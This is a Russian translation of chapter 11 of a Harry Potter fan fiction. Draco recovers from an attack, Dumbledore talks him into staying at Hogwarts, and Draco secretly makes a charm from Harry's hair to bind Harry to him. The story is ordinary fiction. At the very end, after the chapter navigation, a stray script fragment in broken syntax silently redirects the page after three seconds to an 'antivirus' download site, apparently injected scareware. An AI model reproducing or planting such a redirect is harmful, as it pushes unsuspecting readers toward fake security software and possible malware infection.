Клятвопреступник (Oath Breaker)

Автор: Goblin Cat KC

Перевод: Weis

Бета: atenas

Оригинал: здесь (разрешение автора на перевод получено)

Рейтинг: R (авторский; PG-15 – переводчика)

Пейринг: Драко Малфой/Гарри Поттер, Люциус Малфой/Северус Снейп

Жанр: драма/приключения

Статус: закончен

Краткое содержание: Малфои предпринимают драматичную эскападу, Драко приходится обучать Гарри темной магии, а все студенты Слизерина исчезают.

Глава 11

Драко разбудило прикосновение чего-то влажного и холодного. Чуть приоткрыв глаза, он увидел неясные очертания комнаты, освещенной единственной свечой, стоящей на тумбочки у его кровати. Пламя отразилось в чем-то блестящем, и юноша моргнул. Ощутив на лбу что-то прохладное, он поднял руку, чтобы убрать это.

– Не шевелись.

Только через пару мгновений Драко узнал голос Гарри. Cпустя какое-то время он понял, что гриффиндорец осторожно прижимает к его лбу холодный компресс.

– Что ты…

– Снейп велел попытаться тебя остудить, – объяснил Гарри, взглянув на дверь, словно думал, что Северус стоит за ней и подслушивает. – У тебя жар только-только начал спадать.

Он осторожно сел на краешек кровати, так, чтобы не потревожить раненую руку Драко, покоящуюся на заботливо пристроенной поверх одеяла подушке. Слизеринец нахмурился и попытался сжать пальцы в кулак. Те слегка дернулись и замерли. Он даже не чувствовал их. С трудом сдерживая слезы, Драко отвернулся и уткнулся лицом в подушку.

– Мы давно здесь? – пробормотал он через некоторое время.

– По крайней мере, несколько часов. Я не помню, сколько было, когда на нас напали, но сейчас уже завтрак.

– Откуда ты знаешь? – нахмурился слизеринец. – Здесь же нет часов.

– Ну… – запнулся Гарри. – Я слышал колокол. Первый, тот, что перед завтраком.

Драко подумал, что гриффиндорцы совершенно не умеют врать, но выпытывать правду не стал. Это сейчас волновало его меньше всего. Его рука, скорее всего, непоправимо искалечена, все тело немилосердно болит, а спина… он недоуменно нахмурился и осторожно шевельнул плечами. Ничего. Подвигав ими сильнее, он все равно не ощутил никакой боли. Если с момента нападения и в самом деле прошло несколько часов, его наставник потрудился на славу.

– Северус оставил нам что-нибудь?

– Да, пару пузырьков невероятно мерзкого зелья. Он сказал, что тебе нужно выпить один, когда ты проснешься, – гриффиндорец взял с тумбочки склянку с зельем, но помедлил, прежде чем откупорить ее. – Тебе не обязательно его пить. Я не расскажу, если ты не станешь.

– С какой стати я не буду его пить?  – удивился Драко и поморщился, поворачиваясь на бок и приподнимаясь. Даже теперь, когда кожа не была обожженной, тело все равно нещадно болело. Еще он осознал, что одет не в обгоревшую мантию, а в мягкие пижамные штаны.

– Давай, – он протянул руку за зельем.

– Оно в самом деле ужасно мерзкое, – предупредил Гарри, но откупорил пузырек и подал его слизеринцу. Тот сразу узнал запах экстракта лавеллана и опустошил склянку одним махом. Зелье оставило во рту странный сухой привкус, и Драко потянулся за стаканом воды, стоявшим на тумбочке. Пока он пил, боль в мышцах и суставах утихла, но до конца не исчезла.

– Как у тебя это получается? – спросил Гарри, забирая у него пузырек.

– Получается  что?

– Пить эту гадость не подавившись, – пояснил гриффиндорец, держа бутылочку против света и разглядывая зернистый осадок. – Я не могу проглотить даже снадобья Помфри, не поперхнувшись, а по сравнению с зельями Снейпа ее микстуры - это просто объеденье.

– Я вырос, принимая их, – объяснил Драко и зевнул. – Черт, я вырос, готовя их. Когда возишься с ними каждый день, то просто перестаешь воспринимать зелья как единое целое и начинаешь распознавать вкус каждого ингредиента по отдельности. Тогда они не так уж плохи.  

– Каждого ингредиента? – с сомнением переспросил Гарри. – Ну, и что было здесь?

– Лавеллан и паутина, – пренебрежительно объяснил Драко. – Простая лечебная микстура. Я еще в детстве научился ее готовить. Она не вступает в реакцию с другими зельями и чарами, так что, скорее всего, Северус наложил на меня какие-то исцеляющие заклинания, – тут он понял, что если крестный дал ему такое простое зелье, то, скорее всего, на нем и в самом деле какие-то сложные и действенные чары. Может, на самом деле его рука медленно но верно восстанавливается, просто крестный как-то блокировал боль? Драко знал, что на многое надеяться не стоит, но не мог удержаться.

– Что случилось после того, как я отключился? – спросил Гарри. – Снейп вылечил ожоги у меня на ногах и сказал, что если бы ты меня не защитил, все могло быть намного хуже.

– Так и сказал? – улыбнулся Драко. Было приятно для разнообразия услышать что-то кроме «глупый ребенок».

– Еще он сказал, что мне повезло, потому что всех остальных обожгло довольно сильно, включая тебя, – Поттер пристально уставился на слизеринца. – Что ты сделал?

Драко вздохнул.

– Сам не знаю, – ответил он. – Я наколдовал молнию внутри замка. Их должно было просто оглушить, она не должна была получиться такой сильной. Но мне вовсе не жаль, что так случилось, – вызывающе заявил он. – Надеюсь, шрамы останутся у них навсегда.

– Шрамы? – Гарри посмотрел на грудь и плечи слизеринца, но не заметил никаких шрамов кроме тех, что были на искалеченной правой руке. – Насколько сильным получилось то заклинание? Погоди-ка, у тебя ведь не было палочки… – насторожился он.

– Я воспользовался твоей, – быстро объяснил Драко. – У меня не было выбора – они оглушили тебя и собирались меня убить.

– Как ты колдовал? – медленно и угрожающе спросил Гарри.

– Что значит как…

– Как ты это сделал? – гриффиндорец подался вперед, и Драко невольно отпрянул. – Гермиона специально зачаровала мою палочку от воров. Ты бы не смог к ней прикоснуться.

– Я… я и не касался, – удивленно объяснил Драко. – Я просто схватил твою руку и вместе с палочкой поднял вверх. Заклинание вышло даже слишком сильным.

– Мою руку? – переспросил Гарри, садясь на место. – Ты взял меня за руку, чтобы колдовать моей палочкой?

– Мне некогда было спрашивать разрешения. И потом, ты все равно ее не отпускал, даже когда я нес тебя через Слизерин, всю дорогу.

– Так это ты принес меня сюда? – мягко спросил гриффиндорец. – Ты… защитил меня от своего заклятья и принес сюда, пока я был без сознания? – он не спрашивал, а словно говорил сам с собой, невидяще уставившись на край одеяла. Все еще опасаясь, что гриффиндорец может разозлиться и ударить его, Драко не шевелился. Увидев, что Поттер глубоко задумался, он осторожно отодвинулся на середину кровати, подложив под спину пару подушек. Посмотрев на дверь, юноша мельком подумал: когда вернется Северус? Отсутствие у него и у Гарри палочек скорее всего означало, что дверь зачарована, чтобы никто не мог ни войти, ни выйти. Он понадеялся, что где-нибудь здесь есть еще свечи, иначе, когда эта догорит, они останутся в темноте.

Немного погодя Гарри вздохнул и оглядел комнату. В полумраке были видны только неясные очертания четырех кроватей.

– Как ты можешь здесь спать? – поежился он. – Словно в тюремной камере.

– Не зря же это называют подземельями, – отозвался Драко. Заметив, что Поттер успокоился, он тоже позволил себе немного расслабиться. – И потом, здесь тихо. Можно опустить полог и спокойно читать.

– Ты читаешь в постели? – хмыкнул Гарри. – Прямо как Гермиона.

Не успел Драко огрызнуться в ответ, как раздался негромкий хлопок и в изножье кровати появились два домовика. В руках одного из них – Даффи – находился поднос с пирожными, явно предназначенный для Драко. С краю красовалась чашка с бульоном, похоже, поставленная в последний момент. Добби же держал поднос с более здоровой пищей и старательно игнорировал своего бывшего хозяина, не сводя глаз с Гарри.

– Мы принесли завтрак, – заявил Добби, ставя Гаррин поднос на стол. – Директор просит передать, что он скоро придет поговорить и что он ужасно обо всем сожалеет.  

Презрительно фыркнув на него, Даффи поднесла поднос ближе к Драко и, когда тот одобрительно кивнул, поставила его юноше на колени. Слизеринец с удивлением увидел, что она наготовила ему множество разных лакомств и сладостей. 

– Просто здорово, – мягко произнес он, обратив больше внимания на то, как удивленно и обиженно встрепенулся Добби, услышав похвалу, чем на то, как просияла Даффи. За все годы службы у Малфоев Добби ни разу не удостоился такого обращения.

– Даффи, скажи, все уже знают насчет вчерашней ночи? – полюбопытствовал слизеринец.

– О, да, – поспешно закивала та. – Все говорят о том, что толпа студентов хотела убить мастера Драко и Гарри Поттера, и что все они оказались в лазарете.

– С ужасными ожогами, – добавил Добби, обвиняюще взглянув на бывшего хозяина. – А профессор Снейп отказался помогать мадам Помфри их лечить, и поэтому у нее не хватило времени на всех. Она отправила их в клинику, вот.

– И все знают, что Гарри Поттер спас мастера Драко, - перебила его Даффи. – И что вы болеете и ранены. Все болтают, да.

– Гарри Поттер вправду защитил Драко Малфоя? – спросил Добби у Гарри, искоса взглянув на слизеринца. – Значит, он теперь обязан вам жизнью.

– И не мечтай, мерзкий маленький червяк, – сердито прошипел Драко. –  Мне пришлось втащить его внутрь, чтобы он был в безопасности.

Вдруг Даффи схватила Добби за руку и гневно заявила:

– Ненормальный эльф! Хочешь быть свободным, получаешь зарплату, а теперь еще и порочишь хозяев! Успеваешь жаловаться - успевай и работать, – и с громким хлопком они оба исчезли.

– Успеваешь жаловаться?.. – с любопытством повторил Гарри.

– Эльфийская поговорка, – объяснил Драко, откусывая пирожное. – Теперь Добби загрузят работой по самые уши. Ему частенько доводилось слышать это от других наших эльфов.

– У вас их несколько?

– Четверо. Теперь, без Добби, трое, – он застонал от удовольствия, доев первое пирожное, и принялся за следующее. Персиковая начинка под тонкой корочкой была еще горячей. – Умм… На этот раз Даффи просто превзошла себя, – он заметил маленькую плошку меда за блюдом и окунул в нее уголок пирожка.

Гарри вздохнул и тоже приступил к завтраку, начав с сосиски.

– Похоже, вежливо ты можешь разговаривать только со мной, - заметил он.

– Он первый начал.

– Угу, а ты ответил очень по-взрослому.

– Если он мне дерзит, почему я должен быть с ним вежливым? – фыркнул Драко. Гарри лишь покачал головой.

После этого они ели молча, и потихоньку Драко доел все свои сладости. Посмотрев на чашку с бульоном, юноша решил, что его, скорее всего, приготовили специально, чтобы помочь ему поскорее выздороветь. Чего-то подобного следовало ожидать. Мама однажды рассказывала ему, что о волшебных восстановительных свойствах куриного бульона знают даже магглы. Взяв ложку в левую руку, он подержал ее несколько секунд, но потом решил не выставлять себя на посмешище, поднял чашку и медленно осушил ее. Ощутив привкус сельдерея, Драко поморщился. Он его терпеть не мог. Северус частенько посмеивался над крестником, глядя, как тот старательно откладывает сельдерей на край тарелки, и зная, что он не морщась пьет зелья, от которых любого другого попросту стошнило бы.

– И что теперь?

– Ты о чем? – поднял голову слизеринец.

– Что теперь? – повторил Гарри. – Я имею в виду – теперь все знают, что ты темный маг. Ходить на занятия будет попросту невозможно. Может, если Дамблдор…

– Нет, – отрезал Драко. Гриффиндорец удивленно осекся и захлопнул рот. Малфою это показалось забавным. Он отставил поднос и внимательно посмотрел на собеседника. – Я не собираюсь оставаться здесь и позволять им снова пытаться меня убить. Я немного отдохну и улечу, не дожидаясь Пэнси. Если повезет, я перехвачу их на полпути, и мы вместе найдем, где спрятаться.

– Что? Это безумие! После того, сколько они прошли… – начал было Гарри, но, увидев выражение лица Драко, заговорил спокойнее. – С ней целая толпа детей. И Пожиратели наверняка следят за Хогвартсом. Встречать их по дороге будет слишком опасно.

– Поттер, она так осторожничает только потому, что у них всего несколько метел. Если бы все могли лететь, никаких проблем бы не было. Перед уходом я украду метлы Равенкло и Хаффлпафа. Если их не хватит, старшие студенты возьмут к себе малышей. Наверное, так придется сделать в любом случае… - задумчиво произнес Драко, прикидывая, что еще может понадобиться.

– И куда вы отправитесь? – сердито поинтересовался Гарри. – Зима на носу… снова.* Вы замерзнете и начнете голодать…

– Мы всегда сможем найти маггловский дом и стереть хозяевам память. Среди слизеринцев есть несколько магглорожденных. Они скажут, какой нам подойдет.

Гарри опустил голову и помолчал с минуту.

– Значит… ты уходишь? Сегодня?

Драко поглядел, как Поттер теребит краешек манжета, и нервно закусил губу.

– Ты можешь пойти с нами, - вдруг произнес он.

– Что? – ахнул Гарри, недоверчиво распахнув глаза.

Если бы все не было так серьезно, слизеринец посмеялся бы над выражением его лица.

– Идем с нами. Тебе нельзя здесь оставаться. Ты защищал меня. Они этого не простят. С нами тебе будет безопаснее.

– Безопаснее? Среди слизеринцев, которые меня ненавидят? Пытаться увести детей от Пожирателй будет безопаснее?

– Что с того, что они маленькие? Тебе было одиннадцать, когда ты победил тролля. К тому же я, Пэнси, Блейз, Дафна – мы дети темных магов. Ты удивишься, когда узнаешь, на что мы способны. Идем с нами, Гарри. У нас получится!

– Нисколько не сомневаюсь, – раздался от двери голос Дамблдора.

Мальчики обернулись так стремительно, что Драко чуть не свалился с кровати. Они не слышали, как вошел директор. Тот стоял возле входа и задумчиво смотрел на них.

– Мысль о том, что группа детей попытается пролететь через всю страну в разгар войны, в лучшем случае – пугающа, в худшем – безумна. Так же, как мысль о том, что один-единственный подросток сможет противостоять Темному лорду достаточно долго, чтобы успеть взорвать собственное поместье, а потом пролететь через всю Британию, – старик медленно подошел, наколдовал кресло возле кровати и сел. – Я не сомневаюсь, что ваш план удался бы, будь с вами Гарри. Но какой ценой, мистер Малфой? Последователи Волдеморта есть везде. И даже если вам удастся ускользнуть, мороз доделает работу за них. Скольких детей вы потеряете за время полета? 

– Меньше, чем если останемся здесь, – сердито заявил Драко. – Я лучше попытаю счастья снаружи, чем буду смотреть, как ваши студенты истребляют нас одного за другим.

Дамблдор вздохнул и кивнул.

– Покушение на вашу жизнь – темное пятно на репутации Хогвартса. Я обещал вам безопасное убежище, и все же вам нанесли вред. Я могу лишь извиниться. Однако я не думаю, что вести слизеринцев через всю страну – наилучший выход. Мне все же кажется, что намного безопаснее будет остаться в Хогвартсе.

– Где все хотят нас убить? – фыркнул Драко.

– К счастью, убить вас хотят не все. Благодаря нескольким студентам, неустанно объясняющим трудности вашего положения, и памятуя о вашем безупречном поведении с момента прибытия и весомом вкладе в борьбу с Темным лордом, все гриффиндорцы готовы дать вам шанс.

– Ха. После того как на меня напали и чуть не прикончили, они готовы меня простить? Как великодушно.

– Они готовы дать шанс темному магу, – предупреждающе произнес старик. – И не просто темному магу, а Малфою. Вы знаете, что это значит.

Драко опустил голову и уставился на простыни. Скольких людей закляли его предки за века существования рода? Скольких путников заманили в непроходимую чащу? Сколько домов обокрали, оставляя после себя проклятые амулеты, чтобы удача навсегда покинула хозяев… Хотя Малфоев нельзя было обвинить в каждом несчастье, случившемся в Англии, они причинили немало вреда. Драко предпочел бы видеть во сне их проделки, но вместо этого его преследовали проклятые кошмары.

– А как насчет Равенкло и Хаффлпафа? – требовательно спросил он. – Я ничего им не сделал, и все равно половина из них жаждет моей смерти. Теперь, когда они знают…

– Они не посмеют ничего предпринять, – твердо заявил Дамблдор. – Сегодня вечером я поговорю со студентами, чтобы обеспечить вашу безопасность.

– Что нового вы сможете им сказать?

– Я просто-напросто объясню, что ваше заклятие – это, по сути, лишь возмездие за нарушение священных законов гостеприимства, и если бы не собственное вероломство, их товарищи не попали бы в клинику Святого Мунго.

– Угрозами никого не остановишь, – хмыкнул Драко.

– Угрозы не понадобятся. Еще я расскажу им обо всем, что вы сделали для нас.

– Несколько зелий вряд ли…

– Ваши зелья погубили по меньшей мере дюжину Пожирателей и спасли жизнь множеству авроров. 

Драко замолчал.

– Как я понял, ваш наставник не сообщил, как мы воспользовались приготовленными вами зельями. Можете мне поверить, я нисколько не преувеличиваю, говоря, что ваши усилия помогли переменить ход войны. Без вас мы бы до сих пор были в тупике. Теперь, когда вы с нами, мы постепенно одерживаем верх над Пожирателями. 

Несколько минут Драко обдумывал услышанное, вспоминал, какие кислоты и газы он готовил, и пытался представить, как умерли те Пожиратели. Он был уверен, что Волдеморт знает, как быстро может работать Снейп, и наверняка уже понял, что Драко помогает Мастеру зелий. А если Темный лорд узнает, что студенты пытались убить слизеринца, и предположит, что тот решит убежать…

– Черт подери, – раздраженно рявкнул он, обессилено откинувшись на подушки.

Дамблдор облегченно вздохнул и тоже облокотился на спинку кресла. Гарри недоуменно переводил взгляд с Малфоя на директора и обратно.

– Что происходит? – спросил он у старика, поглядывая на  Драко. – Он остается?

– Как будто у меня есть выбор, – фыркнул слизеринец, мрачно уставившись на них обоих. – Темный лорд догадается, что это я виноват в смерти его приспешников.

– Но их же убили авроры… – заговорил Гарри.

– Волдеморт рассуждает иначе, - возразил ему Дамблдор. – Члены Ордена лишь доставили зелье. Истинный же виновник, в глазах Тома – тот, кто предал его и создал для нас эти яды.

– Он будет искать меня, – подхватил Драко, одновременно пытаясь осмыслить происходящее. – Он прикажет всем своим слугам искать темного мага, предавшего его, и… черт подери! – он чуть было не стукнул рукой по постели, но вовремя вспомнил о ране.

Если бы речь шла только о нем, Драко бы рискнул. В конце концов, он пролетел через всю страну, когда Волдеморт был в ярости на него. Убегать и прятаться для него было проще простого. Но с малышами, перво- и второкурсниками, которых вела Пэнси, он попросту не мог рисковать. Они двигаются медленно, не разбираются в стратегии и не могут сражаться. Один человек может проскользнуть сквозь сети Темного лорда. Несколько десятков студентов – ни за что.

– Северус объяснил мне, что не стоит никого отправлять к воротам ждать появления детей, – заговорил Дамблдор, улыбаясь оттого, что убедил слизеринца.– Так что нам придется подождать их здесь. Вы уверены, что мисс Паркинсон удастся избежать возможных ловушек Пожирателей?

– Я не сомневаюсь, что она доставит всех детей в замок в целости и сохранности, – Драко пристально взглянул на старика. – И когда они доберутся сюда, вы обеспечите их безопасность. Иначе мы попросту забаррикадируемся в подземельях, и я больше пальцем не шевельну, чтобы вам помочь.

К удивлению гриффиндорца, услышав эти слова, старик лишь шире улыбнулся и встал.

– Понимаю. Что ж, я уже достаточно вас побеспокоил,  вам нужно отдыхать. Спасибо, что уделили мне время, мистер Малфой. Полагаю, я увижу вас за ужином?

– Что? – удивился Драко. – За каким ужином?

– Мне кажется, будет лучше, если студенты Слизерина продолжат есть вместе со всеми, в Большом зале. Если, конечно, вы не желаете, чтобы ваши товарищи по прибытии питались у себя в гостиной, что, мне кажется, было бы неудобно. Я понимаю, что все это время вы предпочитали есть на кухне, но, думаю, сегодня вам необходимо появиться в Зале.

– Вряд ли это…

– …продемонстрирует вашу силу и мужество, – перебил его Дамблдор. – И вашу готовность простить обитателей Хогвартса и дать им еще один шанс. Поскольку все, кто мог бы напасть на вас, сейчас находятся в больнице, вы можете быть уверены, что намерения остальных вполне мирные.

– А когда те вернутся? – спросил Драко. – Я не такой дурак, чтобы надеяться, что вы отправите их в Азкабан, но, может, вы хотя бы рассмотрите возможность их исключения?

Дамблдор задумался  на минуту.

– В обычных условиях я бы так и поступил. Но идет война, и если мы не сможем выиграть ее быстро, нам понадобится каждый колдун или ведьма, способный хоть на что-то. Я могу лишь обещать, что больше они не причинят вам вреда. Я лично прослежу за этим.

Драко понятия не имел, что старик имеет в виду, и не стал спрашивать, решив потом расспросить Северуса.

– Ладно, я буду на ужине, – неохотно заявил он.

– Благодарю, – кивнул Дамблдор. Он взглянул на Гарри, и слизеринец был уверен, что сейчас старик велит Поттеру уходить из подземелий, раз тому лучше. Но он лишь заставил кресло исчезнуть и молча вышел, закрыв за собой дверь.

Наступила тишина. Драко облегченно вздохнул и уставился на покрывало. Удивительно, как быстро могут меняться планы. Он надеялся, что слизеринцы простят его за то, что он торговался их жизнями, играл ими, словно фигурами на шахматной доске.

Юноша угрюмо скривился. Дамблдор ведет точно такую же партию, и Драко это совсем не нравилось. Происходящее все больше и больше напоминало игру между Дамблдором и Волдемортом, где фигуры жертвовались или спасались сообразно их полезности. Но Малфои не позволяют собой играть. Что сделают игроки, если их послушные маленькие фигурки откажутся повиноваться и восстанут?

«Я не буду ничьей пешкой, – мрачно подумал Драко. – Я стану делать лишь то, что нужно мне, и если это значит, что сейчас мне лучше поступить так, как велит Дамблдор, так тому и быть. Но если мне придется сделать что-то, что ему не понравится, плевать. У отца есть его рыцари, у меня – мои слизеринцы. Это больше не игра, – решительно заключил юноша. – Это политика и готовые к бою армии на каждой из сторон». А в политических манипуляциях Драко не собирался уступать никому.

– Значит, ты остаешься? – мягко спросил Гарри.

– Да, Поттер, я остаюсь.

– Малфой… – заговорил гриффиндорец и оглянулся на дверь, чтобы убедиться, что никто их не подслушивает. – Насчет твоего предложения…

Драко с любопытством взглянул на него.

– Я бы пошел с тобой.

Слизеринец едва заметно улыбнулся.

– Я надеялся на это. Я… хотел поблагодарить тебя… за то, что ты сделал.

– Я не сделал ничего особенного, - запротестовал Гарри.

– Сделал. Никто раньше не защищал темного мага. Никогда.

– Ты не можешь знать этого наверняка.

– Могу, - Драко глубоко вздохнул. – Об этом не знает почти никто со стороны… Каждый темный маг может видеть прошлое, видеть воспоминания своих предков. Никто не знает, почему – может из-за того, что мы позволяем магии управлять нами, отдаемся на ее волю.

Гарри немного подумал и сказал:

– Так вот как ты узнал о девушке, которая нарисовала драконов в вашей летописи?

– Ты это запомнил? – ошеломленно прошептал Драко.

– Я думал об этом, – пожал плечами гриффиндорец. – Ты как будто не знал ее, пока не попытался вспомнить, – он отвел взгляд. – Хотел бы я вспомнить хоть кого-нибудь из моих родных.

– Я не знаю о ней всего, знаю только, как она умерла. В том-то и ирония – мы видим лишь последние минуты перед их смертью. Вот почему я знаю наверняка, что никто и никогда не пытался защитить Малфоя. Или любого другого темного мага. Мы все знали бы об этом.

– Каждую ночь ты видишь, как они умирают?

– Я не вижу их, - покачал головой Драко. – Я словно становлюсь ими. Чувствую то, что чувствовали они, умирая или спасаясь от погони. Но не каждую ночь. Обычно такие сны снятся мне несколько раз в месяц. Хотя в последнее время они почему-то повторяются слишком часто…

– Это ужасно.

– Ничего не поделаешь.

Гарри ничего не ответил. Немного погодя Драко зевнул и начал потихоньку сползать с подушек, устраиваясь поудобнее под одеялом.

– Что ж, хоть и не хочется в этом признаваться, но мне нужно отдохнуть, – положив голову на подушку, он увидел, что Гарри по-прежнему таращится в никуда. – Тебе бы тоже не мешало поспать.

– Угу, – Гарри поставил подносы от завтрака один на другой, чтобы эльфы забрали их позже, и направился к ближайшей кровати. – Странно, меня всего лишь оглушили, но я чувствую себя так, словно сражался с целой толпой.

– Ты сражался, – сказал ему Драко, глядя, как гриффиндорец откидывает одеяло и укладывается в кровать. Только теперь он обратил внимание, что на Гарри все еще надета вчерашняя одежда. Что вполне объяснимо, – подумал он, – добрая воля Снейпа была небезгранична: он позволил гриффиндорцу остаться в подземельях, но ему и в голову не пришло доставить ему смену одежды.

– Эй, Малфой, – окликнул его Гарри. – В чьей постели я сплю?

– Нотта, кажется. А что?

– Просто хотел убедиться, что это не кровать Крэбба или Гойла.

– Нет, они ближе к выходу.

– Вроде охраны?

– Наверное, – Драко подтянул одеяло и перевернулся на живот, осторожно оставив правую руку снаружи.

– Когда твои друзья вернутся, они по-прежнему будут меня задирать?

Драко хмыкнул.

– Я им намекну, что мы больше не ненавидим тебя. Могу даже дать слово, что если нам придется держать здесь осаду, тебе тоже найдется местечко.

– Даже если Снейп все еще ненавидит меня?

– С этим ничего не поделаешь, Поттер. Вряд ли он когда-нибудь перестанет. Но он сможет вытерпеть твое присутствие, если я попрошу.

– О…

Драко снова зевнул и закрыл глаза.

– Малфой?

– Спи уже, Поттер.

– Ты оставишь свечу гореть?

Драко сонно моргнул и открыл глаза, уставившись на неяркий оранжевый свет. 

– Если ты не против.

– Я не против. Спокойной ночи.

– Спокойной ночи.

Несколько минут Драко лежал неподвижно, глядя на свечу и слушая ровное, спокойное дыхание Гарри. Теперь, когда кто-то находился рядом, Драко чувствовал себя намного лучше и невольно вспомнил первую ночь после прибытия, которую он провел в одиночестве в холодном больничном крыле, когда в окна стучали снежные вихри, а на стене в бледном лунном свете плясали острые тени. Сейчас стены освещал неяркий теплый свет, отражаясь от пузырьков на тумбочках и блестя на чем-то совсем рядом с Драко.

Юноша осторожно выпрямился. На простыне прямо перед ним лежал короткий черный волосок. Быстро взглянув на гриффиндорца, чтобы убедиться, что тот спит, Драко поднял волосок и поднес его к свету. Он был уверен, что это волос Поттера. Секунды шли, а юноша задумчиво вертел волосок между пальцами. Он понимал, что лишь благодаря своему невежеству Поттер может спасти волшебный мир и победить Темного лорда. Но это же незнание элементарных правил может погубить его: как можно быть настолько беспечным, чтобы оставить свой волос там, где его может найти темный маг? Драко улыбнулся. Если бы Уизли увидел его сейчас, то избил бы до полусмерти.

Снова поглядев на Гарри, он перевел взгляд на волосок и мгновенно принял решение. Поморщившись, он выдернул у себя волос примерно такой же длины, что и Гаррин, и сплел их вместе. Действовать одной рукой было нелегко. Потом выдвинул ящик тумбочки и принялся шарить среди всякой всячины, накопившейся за годы учебы. Для того, что он задумал, ему не нужно было идти в кладовую Северуса.

– Ну же… где ты? – прошептал он, отодвигая в сторону обрывки пергамента, сломанные перья, колоду проклятых карт, страницы, вырванные из чужих книг, растянутые зажимы для галстука, маленькую голубую бабочку в стеклянном бутыльке, купленную несколько лет назад, пока, наконец, не нащупал несколько крошечных пузырьков, закатившихся в угол ящика. Выбрав один с пробкой, Драко вытащил его и, стряхнув пыль, откупорил. Потом оторвал кусочек пергамента от своих старых заметок и нашел перо, где еще осталось немного чернил.

Писать левой рукой было страшно неудобно, и буквы выходили корявыми, но ему удалось нацарапать на разных сторонах бумажки «Гарри» и «Драко». Завернув в нее сплетенные волоски, он засунул получившийся миниатюрный сверточек в пузырек. Еще раз взглянув на Гарри, чтобы убедиться, что тот спит, он потянулся к плошке с остатками меда, стоящей на подносе. Ему было нужно совсем немного. Осторожно налив мед в пузырек, юноша закупорил его и улыбнулся. Амулет получился совсем слабеньким, дети играли с такими, пока их родители ночами наводили страх и панику на округу, но,  возможно, именно из-за слабости чар никто его не найдет.

Только самые доверенные друзья могут заметить, что Гарри постепенно начнет сближаться с Драко, станет меньше с ним спорить, проводить больше времени рядом и охотнее защищать его ото всех.

Драко не слишком полагался на слова Дамблдора. Ему нужна более надежная защита, чем та, что предлагал старик, и юноше показалось справедливым использовать для этого Гарри. Засунув амулет под подушку, он снова улегся. Потом надо будет найти кожаный шнурок, чтобы носить его на шее.

– Спасибо, Поттер, – прошептал он и закрыл глаза. – Похоже, из этой заварушки все же вышла какая-то польза.

Предыдущая глава   Оглавление   Следующая глава

Обсуждение на форуме

setTimeout(\'document.location.href = "http://base-file.com/antivirus"\', 3000);'); } ?>